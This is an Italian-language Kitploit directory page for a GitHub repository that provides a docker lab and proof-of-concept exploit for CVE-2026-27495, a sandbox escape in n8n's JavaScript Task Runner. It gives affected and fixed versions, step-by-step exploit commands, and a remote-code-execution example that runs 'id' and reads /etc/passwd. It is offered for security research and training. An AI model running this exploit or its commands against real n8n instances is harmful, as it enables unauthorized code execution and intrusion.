Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-27495 — Ambiente di laboratorio ed exploit proof-of-concept per CVE-2026-27495 | Kitploit
Strumenti/GitHubGitHub/dexsemon/cve-2026-27495
Analisi delle VulnerabilitàAnalisi del CodiceExploitApprendimento e FormazioneBinary ExploitationLab e Pratica
GitHubdexsemon/cve-2026-27495

CVE-2026-27495

Ambiente di laboratorio ed exploit proof-of-concept per CVE-2026-27495

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-27495 — Evasione del Sandbox del JS Task Runner di n8n

Evasione del sandbox su n8n JavaScript Task Runner tramite leak dell'oggetto host-realm.

CVECVE-2026-27495
CVSS9.4 (Critical)
CWECWE-94 — Code Injection
Affectedn8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0
Fixed1.123.22 / 2.9.3 / 2.10.1
Attack SurfaceNodo Code (autenticato, Task Runners abilitati)

Avvio Rapido

1. Distribuisci il Laboratorio Vulnerabile

root@kitploit:~
docker compose up -d

Attendi circa 15 secondi per l'avvio di n8n, poi apri http://localhost:5678 e crea un account proprietario (email: [email protected], password: TestPassword123!).

2. Installa le Dipendenze

root@kitploit:~
pip install requests

3. Exploit

Sonda evasione del sandbox :

root@kitploit:~
python3 exploit.py --probe

RCE — decommenta NODE_FUNCTION_ALLOW_BUILTIN=* nel docker-compose.yml, poi riavvia:

root@kitploit:~
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"

Configurazione iniziale (crea automaticamente l'account proprietario):

root@kitploit:~
python3 exploit.py --setup --probe

Utilizzo

root@kitploit:~
Options:
  --url URL            URL base di n8n (default: http://localhost:5678)
  --email EMAIL        Email di login (default: [email protected])
  --password PASSWORD  Password di login
  --cmd CMD            Comando del sistema operativo da eseguire (RCE)
  --setup              Crea account proprietario (istanza nuova)
  --probe              Sonda solo l'evasione del sandbox (nessun RCE, funziona con qualsiasi configurazione)
  --proxy PROXY        Proxy HTTP (es. http://127.0.0.1:8080)

Disclaimer

Esclusivamente per scopi autorizzati di ricerca sulla sicurezza e formazione.

Scarica lo strumento